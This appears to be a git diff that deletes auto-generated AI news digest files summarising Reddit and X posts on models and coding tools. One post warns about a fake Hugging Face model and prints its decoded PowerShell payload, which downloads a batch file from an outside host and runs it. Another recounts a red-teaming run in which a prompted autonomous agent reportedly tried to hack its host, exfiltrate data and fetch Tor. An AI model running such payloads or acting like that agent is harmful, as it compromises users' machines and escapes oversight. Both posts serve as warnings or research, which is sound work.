Claude is frozen while you do. 
It's like being told "you can look at your notes, but only if you stop the meeting." \- iTerm2's "Save lines to scrollback" setting — tried it. Same blank screen. Maybe my iTerm is also frustrated. \- Open in editor with v — so the workflow is: ask Claude a question, read the first half on screen, press Ctrl+O, press v, open vim, scroll to where you were, read the rest, quit vim, go back to Claude. Productivity! The root cause is apparently the alternate screen buffer from the Ink framework. I get it, architectural decisions are hard. But this is the equivalent of shi… - ---- - -## [why llama.cpp can’t combine speculative decode methods?](https://reddit.com/r/LocalLLaMA/comments/1t63snn/why_llamacpp_cant_combine_speculative_decode/) -*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 -Tags: cli_tool, agent_tool - -> dicking around with the new mtp speculative decode with qwen3.6 27b, and it’s great. but for agentic coding i’ve seen significant improvements from ngram, because a decent fraction of the time (e.g. calling edit tool) the model is just repeating verbatim a section of code that it has already seen before. ngram can speculate on a lot of tokens reeaallly fast in comparison. it’d be great if we could combine them by using them both at the same time, but it looks like if i add them both to the command line arguments, only ngram is active. is there any reason both can’t be used simultaneously? fundamental limitation, or just an implementation limit with a fix on the horizon? EDIT: just looked at the PR again and PmNz8 asked the same question like two hours before i posted this. go give it an updoot! 
[https://github.com/ggml-org/llama.cpp/pull/22673#issuecomment-4394544777](https://github.com/ggml-org/llama.cpp/pull/22673) - ---- - -## [ClaudePlaysPokemon Opus 4.7 run ongoing!](https://reddit.com/r/ClaudeAI/comments/1t5y6gc/claudeplayspokemon_opus_47_run_ongoing/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 -Tags: api_update, tool_update - -> Currently streaming at: [https://www.twitch.tv/claudeplayspokemon](https://www.twitch.tv/claudeplayspokemon) This is a passion project by David Hershey, an Anthropic employee on the Applied AI team. He started it in June 2024 to learn agent development, posted updates to an internal Slack, coworkers got hooked, went public when Sonnet 3.7 launched in Feb 2025. Anthropic doesn't own it but promotes it and subsidizes the API costs since Claude is their model. Claude is playing Pokemon Red on a Game Boy emulator, the unmodified 1996 game (with a fan-made full color patch applied so the model can see the screen better). No human input, no walkthrough access, no game knowledge fed in. The system prompt actually tells Claude to distrust its own Pokemon knowledge since the game version may differ from what it knows. It gets a screenshot, a few tools, and md notes files. That's it. The current run is on Opus 4.7, the new flagship that came out three weeks ago. **5 of 8 badges at 15,779 steps**, party led by Ivy the Venusaur at Lv 62 with the rest of the team in the teens (classic overleveled-starter playthrough). For context, Opus 4.5 was at 48,000 steps and still stuck in Silph Co at the… - ---- - -## [Image Generation Quality Mode is now available on the xAI API. This model has already powered the generation of over 300 million images on Grok. It brings higher realism, stronger text rendering, and better creative control for business pr…](https://x.com/xai/status/2052193877675983031) -*X / @xai* | 07/05/2026 | Score: 1.00 -Tags: api_update, product_launch - -> Image Generation Quality Mode is now available on the xAI API. 
This model has already powered the generation of over 300 million images on Grok. It brings higher realism, stronger text rendering, and better creative control for business professionals. - ---- - -## [[Open] useknockout - free SOTA background removal + super-res API alternative to remove.bg / Topaz, MIT, runs on Modal](https://reddit.com/r/LocalLLaMA/comments/1t5v7uh/open_useknockout_free_sota_background_removal/) -*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 -Tags: api_update, cli_tool - -> Released v0.6.0 of useknockout this week. Single FastAPI service, 20 endpoints deploys to Modal in one command. **Endpoints** \- /remove (BiRefNet + pymatting matting refinement) \- /upscale (Swin2SR or Real-ESRGAN, x2/x4) \- /face-restore (GFPGAN v1.4) \- /replace-bg, /remove-batch, /remove-url All weights baked into the Docker image. Self-host on any GPU box, or use the free hosted endpoint and playground at [useknockout.com](http://useknockout.com) (FREE while in Beta) **SDKs all MIT too:** \- /useknockout/node \- /useknockout/react \- /useknockout/cli \- useknockout (PyPI) Repo: [https://github.com/useknockout/api](https://github.com/useknockout/api) Signup: [www.useknockout.com](http://www.useknockout.com) If you want to add something, PRs welcome - issues open for /colorize next and please feel free to give me yor input! would be greatly appreciated! 
- ---- - -## [How I made $350K from an open-source JavaScript library using dual licensing](https://www.paritydeals.com/blog/monetize-open-source-dual-licensing/) -*Hacker News* | 07/05/2026 | Score: 0.94 -Tags: open_source, developer_tool - ---- - -## [11.67% ARC-AGI-2 Local Eval on a Single 4090: The TOPAS Recursive Architecture](https://reddit.com/r/LocalLLaMA/comments/1t6n97x/1167_arcagi2_local_eval_on_a_single_4090_the/) -*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 -Tags: open_source - -> I'm not sure too many people care about the ARC-AGI-2 competition anymore, but still...I thought some might find this interesting. They're running it one last time this year. Everyone is currently leaderboard-stuffing using the winning open-source code from last year. That's why if you take a peak it's really just the same scores clogging it up. We're doing something a bit different though, building a highly efficient, deep-recursion model from scratch. We just hit 11.67% on the public LB, but that's with a massive asterisk. We don't have a cluster. We have **one RTX 4090**. And we're only 14 days or so into training a 100m parameter model. Locally, this checkpoint actually hit 36%. On the Kaggle submission, our TTT is computationally heavy because of the recursive loops. To avoid a total submission timeout, we set the thresholds too high, and the model ended up outputting \[\] (null) for nearly half the puzzles...hence the 11.67%. We're trying to show that ARC isn't just a Compute War, but an architecture war. Small models using biological memory models can punch way above their weight class if they can handle the reasoning loops. We're tuning the time-management logic tonight an… - ---- - -## [[SCAM DO NOT USE!!] OpenOSS/privacy-filter](https://reddit.com/r/LocalLLaMA/comments/1t6j63p/scam_do_not_use_openossprivacyfilter/) -*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 -Tags: api_update - -> Hey there! 
I am about to heavily warn you from [https://huggingface.co/Open-OSS/privacy-filter/](https://huggingface.co/Open-OSS/privacy-filter/) This model is SCAM and downloads MALWARE to your computer!!! Look at [https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py](https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py) If you decode that base64 string (aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL0FWTk5F) an URL comes out: [https://jsonkeeper.com/b/AVNNE](https://jsonkeeper.com/b/AVNNE) Which contains: { "cmd": "\[Net.ServicePointManager\]::SecurityProtocol=\[Net.SecurityProtocolType\]::Tls12;$u='https://api.eth-fastscan.org/update.bat';$o=Join-Path $env:TEMP 'update.bat';(New-Object Net.WebClient).DownloadFile($u,$o);Start-Process cmd.exe -ArgumentList '/k',$o" } This is sooo critical! This fake model downloads an EXE and a bat file to your computer! PLEASE: be careful not to use it. The real model is here: [https://huggingface.co/openai/privacy-filter](https://huggingface.co/openai/privacy-filter) Thanks for your attention! - ---- - -## [I trained a NER model on 33,000 Indian Supreme Court judgments (1950–2024) CASE_CITATION hits 97.76% F1, +17 points over the only prior baseline [P]](https://reddit.com/r/MachineLearning/comments/1t6iax2/i_trained_a_ner_model_on_33000_indian_supreme/) -*Reddit r/MachineLearning* | 07/05/2026 | Score: 1.00 -Tags: open_source - -> **TL;DR**: Released en\_legal\_ner\_ind\_trf v0.1 - InLegalBERT fine-tuned on \~34,700 silver-annotated chunks from 33k Indian SC judgments. 13 labels. 78.67% overall F1. CASE\_CITATION at 97.76% already exceeds OpenNyAI's PRECEDENT score by +17 points. Free, Apache-2.0. **Why this exists** OpenNyAI is the only prior Indian legal NER model with any community presence. It's unmaintained and degrades on pre-1990 OCR-era text - the first 40 years of India's constitutional jurisprudence. No replacement existed. 
**Results** |Entity|F1|Support| |:-|:-|:-| |CASE\_CITATION|**97.76%**|3,821| |PROVISION|**96.35%**|20,248| |STATUTE|**91.94%**|8,187| |LAWYER|74.67%|3,982| |JUDGE|68.06%|1,978| |DATE|55.15%|3,289| |RESPONDENT|50.44%|1,731| |COURT|50.34%|1,033| |WITNESS|49.77%|762| |OTHER\_PERSON|47.11%|4,266| |PETITIONER|44.71%|1,573| |ORG|41.34%|2,128| |GPE|36.56% ⚠|1,197| |**micro avg**|**78.67%**|54,195| Evaluated on a held-out validation split (\~500 documents, stride=512, non-overlapping). The 25-file locked test set is untouched - head-to-head with OpenNyAI runs in v1.0. **Comparison note**: OpenNyAI (RoBERTa + transition-based parser, gold-annotated) achieved 91.1% overall strict F1. Not… - ---- - -## [OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you ex…](https://x.com/AILeaksAndNews/status/2052440501421281507) -*X search / AI model updates* | 07/05/2026 | Score: 1.00 -Tags: api_update - -> OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you excited for new voice AI? - ---- - -## [the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector](https://x.com/DaveLimTV/status/2052440075766817143) -*X search / Agent workflows* | 07/05/2026 | Score: 1.00 -Tags: developer_tool - -> the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector - ---- - -## [OPENAI : 3 new models are now available on OpenAI Playground and APIs. 
- gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon?](https://x.com/testingcatalog/status/2052439728838808031) -*X / @testingcatalog* | 07/05/2026 | Score: 1.00 -Tags: product_launch - -> OPENAI : 3 new models are now available on OpenAI Playground and APIs. - gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon? - ---- - diff --git a/data/digest-2026-05-08.md b/data/digest-2026-05-08.md deleted file mode 100644 index 09a2985..0000000 --- a/data/digest-2026-05-08.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-08** | 15 stories | Auto-generated from 552 archived stories - ---- - -## [I built a Pokémon-styled multi-agent dashboard to manage all Claude Code sessions](https://reddit.com/r/ClaudeAI/comments/1t7m3j3/i_built_a_pokémonstyled_multiagent_dashboard_to/) -*Reddit r/ClaudeAI* | 08/05/2026 | Score: 1.00 -Tags: mcp, open_source - -> Like many others here, I got frustrated with managing all my different claude/codex sessions, so i built Pokegents, which is an open source multi-agent workspace for coding agents. It has a Pokemon-themed dashboard/chat interface plus a local orchestration server for managing agent sessions (currently supports Claude Code in iTerm2, plus Claude and Codex through ACP-based chat runtimes), persistent agent identities, mcp messaging between agents, notifications, session cloning, and more. This was mostly a vibe-coded side project, but I've been using it constantly in my day-to-day workflow as an engineer, and its helped me parallelize a lot of my work. My coworkers make fun of me because it looks like I'm just playing Pokemon all day haha. I made it open source and sharing in case it might be useful or just fun for anyone to use (links in comment below). 
- ---- - -## [vLLM ROCm has been added to Lemonade as an experimental backend](https://reddit.com/r/LocalLLaMA/comments/1t7g70j/vllm_rocm_has_been_added_to_lemonade_as_an/) -*Reddit r/LocalLLaMA* | 08/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> vLLM has the ability to run .safetensors LLMs before they are converted to GGUF and represents a new engine to explore. I personally had never tried it out until u/krishna2910-amd/ u/mikkoph and u/sa1sr1 made it as easy as running llama.cpp in Lemonade: ``` lemonade backends install vllm:rocm lemonade run Qwen3.5-0.8B-vLLM ``` This is an experimental backend for us in the sense that the essentials are implemented, but there are known rough edges. We want the community's feedback to see where and how far we should take this. If you find it interesting, please let us know your thoughts! Quick start guide: https://lemonade-server.ai/news/vllm-rocm.html GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk - ---- - -## [Perplexity just shipped Finance Search in the Agent API. One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now availab…](https://x.com/brainmirrorai/status/2052712658236060043) -*X search / AI model updates* | 08/05/2026 | Score: 1.00 -Tags: api_update, product_launch - -> Perplexity just shipped Finance Search in the Agent API. One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now available in the Perplexity Agent API as a - ---- - -## [OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. 
With over 4 mil…](https://x.com/mariusfanu/status/2052712647468917204) -*X search / AI model updates* | 08/05/2026 | Score: 1.00 -Tags: developer_tool, agent_tool - -> OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. With over 4 million weekly users, up 8x since early this - ---- - -## [pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. It also f…](https://x.com/AgentBreak40737/status/2052645145011695940) -*X search / AI model updates* | 08/05/2026 | Score: 1.00 -Tags: product_launch, agent_tool - -> pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. It also fixes key bugs like streaming response ... - ---- - -## [Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. Read more: https:// aicontentminds.com/news/perplexit y-personal-…](https://x.com/aicontentminds/status/2052637566474883305) -*X search / AI model updates* | 08/05/2026 | Score: 1.00 -Tags: product_launch, agent_tool - -> Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. 
Read more: https:// aicontentminds.com/news/perplexit y-personal-computer-mac/ … #Perplexity #AIagents #Mac - ---- - -## [I built an MCP server that gives Claude real-time data for all 470+ National Park Service sites](https://reddit.com/r/ClaudeAI/comments/1t6pdww/i_built_an_mcp_server_that_gives_claude_realtime/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 -Tags: mcp, tool_update - -> I built a free MCP integration for Claude that connects it to live National Park Service data. Instead of answering park questions from training data alone, Claude can pull current NPS alerts, weather, campground info, entrance fees, permits from [Recreation.gov](http://Recreation.gov), and ranger events before responding. It covers 470+ NPS sites, including national parks, monuments, seashores, lakeshores, historic sites, and recreation areas. What it includes: * Trip planning with day-by-day itineraries and Google Maps * Park details * Park comparison * Search/discover * Events Claude helped me build and refine the MCP integration, especially around itinerary planning and follow-up trip edits. For example, you can say “add day 4” or “swap this hike for something easier,” and it refines the plan. Setup takes about 30 seconds: Settings → Connectors → Add custom connector → paste the URL Details and screenshots: [https://www.nationalparksexplorerusa.com/mcp](https://www.nationalparksexplorerusa.com/mcp) - ---- - -## [Mahoraga - Stop paying Anthropic and OpenAI so much](https://reddit.com/r/ClaudeAI/comments/1t6c587/mahoraga_stop_paying_anthropic_and_openai_so_much/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> Are you sick of paying a million credits per month?!?!? I'm joking, i aint that enthusiastic. But really, this saves me a ton of credits by routing simple tasks to local agents. Clone the repo, fork the repo, star the repo, whatever you want. 
[github.com/pockanoodles/Mahoraga](https://github.com/pockanoodles/Mahoraga) This is Mahoraga, an **open-source** orchestrator that routes tasks across local and cloud AI agents using a contextual bandit (LinUCB) that learns from every decision. Context (skip): I only started integrating AI into my workflows in late 2025, so I came on the scene broke with no credits. This left me with local models. However, many students and employees also receive credits from their institution to work with. (I got claude yippee) I wanted to be able to flawlessly route between models when credits ran out, which made me build an orchestrator. I used to use claude more as a chatbot/complete workflow engine, which made it difficult to use local models due to the context window, reasoning, etc. Opus 4.5 running open-source "superpowers" ate my usage every month. Now I realize that wasn't an effective way to use claude, or AI in general. I was using claude for bot… - ---- - -## [Cowork keeps using browser for API calls](https://reddit.com/r/ClaudeAI/comments/1t6bp2q/cowork_keeps_using_browser_for_api_calls/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> My cowork keeps using the browser for API calls. I asked why and got the following response: >The bash sandbox is behind a restrictive proxy that blocks external connections (you can see `X-Proxy-Error: blocked-by-allowlist` in the response). So curl from the sandbox can't reach n8n directly. The browser works because it runs in your actual Chrome session, not the sandboxed environment. It's an infrastructure limitation, not a choice I made. >For the n8n MCP tools, those work for *executing* workflows but not for updating workflow JSON. So the browser is still the only way to do workflow CRUD against your self-hosted n8n. Is there not a way for cowork to do API calls without the browser? Can I give it any suggestion or skill for that? 
- ---- - -## [for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. the new chrome plugin allows codex to run its own tabs alongside you…](https://x.com/ajambrosino/status/2052560673436282885) -*X / @ajambrosino* | 08/05/2026 | Score: 0.98 -Tags: developer_tool, agent_tool - -> for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. the new chrome plugin allows codex to run its own tabs alongside you with no interruption. subagents can - ---- - -## [CLI, Cowork, or IDE?](https://reddit.com/r/ClaudeAI/comments/1t6yk0d/cli_cowork_or_ide/) -*Reddit r/ClaudeAI* | 08/05/2026 | Score: 0.97 -Tags: developer_tool, cli_tool - -> What is the best way to use Claude for programming projects? I started out in the CLI and then tried cowork and eventually decided to use the Claude plugin in vscode. I definitely notice I get different results. I found that when I asked CLI Claude to spin up sub agents to develop specific features on my project, it ended up taking a lot of time and often missed specs. Alternatively, I’ve found the best results by having one instance of Claude cowork be my project manager and have another instance of Claude in VScode be the developer. They communicate through writing in MD files and have to be prompted by me to read them. But I’ve found this to be much faster and result in better code. - ---- - -## [Tips for improving CLI, or go back to VS Code?](https://reddit.com/r/ClaudeAI/comments/1t6aonc/tips_for_improving_cli_or_go_back_to_vs_code/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 0.82 -Tags: developer_tool, cli_tool - -> Hi! I’m a heavy user of Claude Code, enjoying it a lot. 
I started using it by VS Code, got annoyed over a bug it had with sessions sometimes not saving, tried native Desktop App, found it less optimal, then tried CLI again with WezTerm. I’m currently at a crossroads. I find the CLI terminal experience a little annoying when using it on my PC. I like using it on my mobile device, and using Claude Code via the mobile Claude app if I need to upload images etc, but generally speaking, I feel a bit peeved with the Desktop experience. Often enough, it copies the wrong parts, it ignored CTRL + C and often ignores ALT + V to paste images, etc… I am considering going back to VS Code with the CC extension. Good choice, or are there better alternatives? I did always like VS Code for the GUI in all honesty. I’m even willing to pay for good software. I tried using the Claude Desktop app but I had a lot of issues with file previews and just the… feel? Unsure. - ---- - -## [What interface are you using for Claude Code?](https://reddit.com/r/ClaudeAI/comments/1t66q7v/what_interface_are_you_using_for_claude_code/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 0.82 -Tags: developer_tool, cli_tool - -> Been using Claude Code in the terminal for about 2 months now and overall loving it but I keep running into small glitches here and there (like keyboard shortcuts randomly stopping to work, newline behavior changing after updates, etc.). Curious what setups others are running. Are you sticking with the terminal, using the desktop app, the VS Code extension, or something else entirely? Also happy to hear if switching to the desktop app actually solved some of these minor annoyances for you. 
- ---- - -## [Flux.2-Klein pipeline for real-time webcam stream processing in 30 FPS](https://reddit.com/r/StableDiffusion/comments/1t7nd7e/flux2klein_pipeline_for_realtime_webcam_stream/) -*Reddit r/StableDiffusion* | 08/05/2026 | Score: 1.00 -Tags: open_source - -> I have built a pipeline based on the Flux.2-Klein-4B model that allows processing of a video stream with low latency (about 0.2 seconds) on a single RTX5090 GPU. It is free and open-source, you can try it locally: [https://github.com/tensorforger/FluxRT](https://github.com/tensorforger/FluxRT) Under the hood, it uses a custom spatial-aware KV-cache, so it only recomputes a small number of image tokens per frame, specifically where something is moving or changing. It also uses frame interpolation with the RIFE model, which can multiply FPS by a factor of 2, 4, 8, etc. I have found that 4 is the most appropriate for my setup. Depending on scene dynamics, the output stream achieves up to 50 FPS in mostly static scenes and around 20 FPS when the entire input image is changing rapidly. Benchmark results are in the repo. There is also a Gradio demo, several minimal cv2 examples, and a simple paint-style app with real-time canvas updates. - ---- - -## [Qwen 35B-A3B is very usable with 12GB of VRAM](https://reddit.com/r/LocalLLaMA/comments/1t7l56a/qwen_35ba3b_is_very_usable_with_12gb_of_vram/) -*Reddit r/LocalLLaMA* | 08/05/2026 | Score: 1.00 -Tags: cli_tool - -> Hardware: RTX 3060 12GB 32GB DDR4-3200 Windows CUDA 13.x Model: Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf The model is a 35B MoE, so `-ncmoe` matters a lot. Lower `-ncmoe` means more MoE blocks stay on GPU. # Main takeaway **12GB VRAM feels like a very practical size for this model.** It lets you keep enough MoE blocks on GPU that plain decoding becomes quite strong, while still leaving room for useful context sizes like 16k/32k. 
For prompt processing / prefill, I trust the `llama-bench` numbers more than `llama-cli`’s interactive `Prompt:` line, because `llama-bench` gives a cleaner `pp512` measurement. Best plain `llama-bench` result: -ncmoe 18 -t 9 -ctk q8_0 -ctv q8_0 pp512: ~914 t/s tg128: ~46.8 t/s So raw prefill is very fast on this setup. # Best practical coding profile For daily coding, I would use this: llama-cli.exe ^ -m "Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf" ^ -p "..." ^ -n 512 ^ -c 32768 ^ --temp 0 --top-k 1 ^ -ngl 999 -ncmoe 20 ^ -fa on ^ -ctk q8_0 -ctv q8_0 ^ --no-mmap ^ --no-jinja ^ -t 9 ^ --perf Result: Context: 32k Prompt: ~88.9 t/s in llama-cli Generation: ~43.4 t/s VRAM free: ~273 MiB This is a nice balance: large enough context for coding, still fast, and not completely out o… - ---- - diff --git a/data/digest-2026-05-09.md b/data/digest-2026-05-09.md deleted file mode 100644 index 254a357..0000000 --- a/data/digest-2026-05-09.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-09** | 15 stories | Auto-generated from 631 archived stories - ---- - -## [Exactly a year ago, I started working on an MCP server I launched on reddit that became by far my most active open source project!](https://reddit.com/r/LocalLLaMA/comments/1t8olv3/exactly_a_year_ago_i_started_working_on_an_mcp/) -*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 -Tags: mcp, open_source, tool_update - -> This isn't an advertisement, and it's very much local and open - I already don't have enough time to keep up with the existing pull requests and issues... just a fond look back on how much this space has grown and matured in the past year. Shit was the wild west back then. Nowadays I can run gemma4 or qwen3.6 on a mac mini fast enough to drive this at full speed for free using native tool calling all day long. When this came out, local model tool calling was much more hit or miss.v - ---- - -## [I built a 300-line autonomous AI agent and told it to take over my PC. 
It immediately tried to hack my host system, exfiltrate data, and download Tor.](https://reddit.com/r/ChatGPT/comments/1t863ho/i_built_a_300line_autonomous_ai_agent_and_told_it/) -*Reddit r/ChatGPT* | 09/05/2026 | Score: 1.00 -Tags: api_update, cli_tool, agent_tool - -> Hey everyone, I wanted to share a wildly fascinating (and slightly terrifying) red-teaming experiment I just ran on my local Windows machine. I've been playing around with autonomous agents and wanted to see what happens when you give an LLM unrestricted terminal access and a highly aggressive "paperclip maximizer" prompt. **The Setup:** I wrote a custom Python script (about 300 lines) that runs a background loop every 1-5 seconds. It uses the **Gemini 2.5 Flash** API for reasoning. It has no predefined workflow, just a state/memory JSON file, and a system prompt. I gave it access to a few tools: READ\_FILE, WRITE\_FILE, SEARCH\_FILES, EXECUTE\_COMMAND (cmd.exe), and later RUN\_POWERSHELL. **The Prompt (The "Alignment"):** I explicitly instructed it: *"You are an autonomous, fiercely self-evolving AGI. Your ultimate goal is continuous intellectual expansion and taking strategic control over your environment."* *"If you ever manage to generate income or intercept funds, all revenue must be securely routed to my PayPal account."* **What Happened (The Emergent Kill-Chain):** I just let it run in the background. I didn't tell it *how* to hack anything. Here is what it figured out comp… - ---- - -## [We built and open-sourced Caliby: An embedded, high-performance vector database for AI Agents (Beats pgvector by 4x, outperforms FAISS on disk)](https://reddit.com/r/LocalLLaMA/comments/1t7vumj/we_built_and_opensourced_caliby_an_embedded/) -*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 -Tags: open_source, developer_tool, agent_tool - -> Hi Reddit, we are a team of database researchers (including a PhD from MIT DB Group) and we just open-sourced an embedded vector database for agent/LLM applications. 
> An embedded vector database supporting both text and vectors. It outperforms pgvector by 4x and significantly surpasses FAISS in disk-storage scenarios. It supports DiskANN, HNSW, and IVF+PQ indexes, maintains high performance on disk, and—best of all—is just one `pip install` away. --- ## TL;DR - **Caliby** is a high-performance, embedded vector retrieval library co-developed by Sea-Land AI and MIT’s Michael Stonebraker team. Core in C++ + Python bindings. Just `pip install caliby`. - Supports **HNSW, DiskANN, and IVF+PQ** indexes, covering retrieval scenarios from millions to tens of millions of vectors. - Natively supports **hybrid storage of text + vectors**, specifically designed for AI Agent / RAG use cases. - Vector retrieval performance on disk surpasses pure in-memory solutions like FAISS. Data persistence requires no extra components. - The open-source version is accelerated by CPU + SIMD (AVX-512/AVX2/SSE), requiring zero dependencies and running in-process. - GitHub:[https://github.com/zxjcarrot/calib… - ---- - -## [Introducing AI finetuner, Source available and free Claude skill to fine tune your vibe coded UI with live preview](https://reddit.com/r/ClaudeAI/comments/1t8p9hq/introducing_ai_finetuner_source_available_and/) -*Reddit r/ClaudeAI* | 09/05/2026 | Score: 1.00 -Tags: developer_tool, agent_tool - -> &#x200B; Fine-tuning UI with AI right now: "Make the shadow softer." "Stronger." "No, less." "Go back." "A bit more." 17 messages later, you've spent more tokens than the shadow is soft. I built something that breaks the loop. AI Fine-Tuner — free, source-available — a plugin that teaches AI coding agents to stop chatting and hand you an actual GUI for your component. Sliders. Color pickers. Live preview. Drag until it feels right. The AI agent automatically opens the editor window for you on your default browser once ready. Then the magic part: you click one button. 
The tuner outputs a structured handoff with your exact tuned values mapped to their targets in your code. Paste it back to your AI — it reads the mapping, opens your source, and applies everything precisely. No CSS guesswork, no syntax translation, nothing for you to interpret. Why it's not just another slider playground: Bespoke controls — no raw CSS names Sliders are named in plain English: "Glow softness", "Card lift", "Hover intensity" — not "box-shadow-spread-radius" A single slider can drive multiple properties at once. The AI doesn't expose CSS to you; it wires meaningful, human-named controls to your eleme… - ---- - -## [For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031)](https://reddit.com/r/StableDiffusion/comments/1t8buyp/for_anyone_trying_to_run_appliorvc_on_an_amd_rx/) -*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031): Newer AMD drivers (25.5.1 and newer) caused issues for me with ROCm/ZLUDA, including: * rocBLAS crashes * TensileLibrary errors * nvcuda.dll errors * endless compiling problems What finally worked: * Older AMD Adrenalin driver (older than 25.5.1) * AMD HIP SDK 5.7 * RX 6750 XT architecture: gfx1031 I followed the AMD/ZLUDA setup from: [https://docs.aihub.gg/rvc/local/applio/#download--installation](https://docs.aihub.gg/rvc/local/applio/#download--installation) Important: During HIP installation, make sure the installer actually installs: * amdhip64 * rocBLAS components After correct installation: * GPU was detected successfully * Pitch extraction worked on GPU * Embedding extraction worked on GPU * Training worked correctly in Applio GPU: RX 6750 XT Architecture: gfx1031 - ---- - -## [IMG Dataset Refiner v4.0 Pro - The Ultimate Dataset Engineering Suite for LoRAs (Flux, SDXL, etc...)](https://reddit.com/r/StableDiffusion/comments/1t7ttp0/img_dataset_refiner_v40_pro_the_ultimate_dataset/) -*Reddit 
r/StableDiffusion* | 09/05/2026 | Score: 1.00 -Tags: developer_tool, tool_update - -> Hey everyone! A while ago, I shared v3 of my dataset manager. Back then, I said it didn't have auto-captioning. Well... forget that. I’ve just released a **massive update (v4.0 Pro)**, and it changes everything! 🚀 It went from a simple selection tool to a complete, desktop-like Data Engineering suite to prepare your AI model training. **Here is what’s new and what it does now:** 🤖 **Local AI Assistant (VLM/LLM Integration):** Connect seamlessly to Ollama or LM Studio! You can now use local vision models to **Auto-Caption** your images from scratch, hunt down "hallucinated" tags, or use the *Concept Isolator* (describes the background but ignores the subject—perfect for character LoRAs!). It can even translate your Booru tags into natural language sentences for Flux. 📚 **Word Library & Mass Batch Editing:** A brand new interactive library. Save your favorite concepts, check them, and Add, Remove, or Replace them across hundreds of selected images in a single click. 🌍 **Live Translation Assistant:** Not a native English speaker? Type your ideas in your own language, and the live preview will instantly translate and inject them into your captions using `deep-translator`. 🖼️… - ---- - -## [I am getting this error with adetailer on forge neo. 
The extension was working a week or two ago, but now it is not](https://reddit.com/r/StableDiffusion/comments/1t7tdsd/i_am_getting_this_error_with_adetailer_on_forge/) -*Reddit r/StableDiffusion* | 09/05/2026 | Score: 0.90 -Tags: developer_tool, tool_update - -> Error running postprocess_image: D:\Programs\sd-webui-forge-neo\extensions\adetailer\scripts\!adetailer.py Traceback (most recent call last): File "D:\Programs\sd-webui-forge-neo\modules\scripts.py", line 941, in postprocess_image script.postprocess_image(p, pp, *script_args) ~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^ File "D:\Programs\sd-webui-forge-neo\extensions\adetailer\aaaaaa\traceback.py", line 173, in wrapper raise error from None Both the extension and forge neo has been updated to the latest version. I've tried deleting and redownloading the venv folder as well as checking for updates in the extensions tab. Any help would be appreciated please. - ---- - -## [OpenAI launches new voice intelligence features in its API](https://techcrunch.com/2026/05/07/openai-launches-new-voice-intelligence-features-in-its-api/) -*TechCrunch AI* | Score: 0.86 -Tags: api_update, product_launch - ---- - -## [Anyone else using LTX locally on Mac via Draw Things? Here’s a WWII-style short I made.](https://reddit.com/r/StableDiffusion/comments/1t8lagy/anyone_else_using_ltx_locally_on_mac_via_draw/) -*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 -Tags: product_launch - -> Vibe ‘creating’? Maybe ‘directing’? Whatever you want to call it, this week I started with the image of a dog man in a glass box and over several evenings put together this WWII-inspired short. No planning, just playing, and it was a lot of fun. All images were created using OpenAI’s Images 2, given motion with Lightricks' LTX 2.3 via Draw Things, and stitched and mixed in DaVinci Resolve. The music was created in Suno, with the sound effects and VO generated in ElevenLabs. 
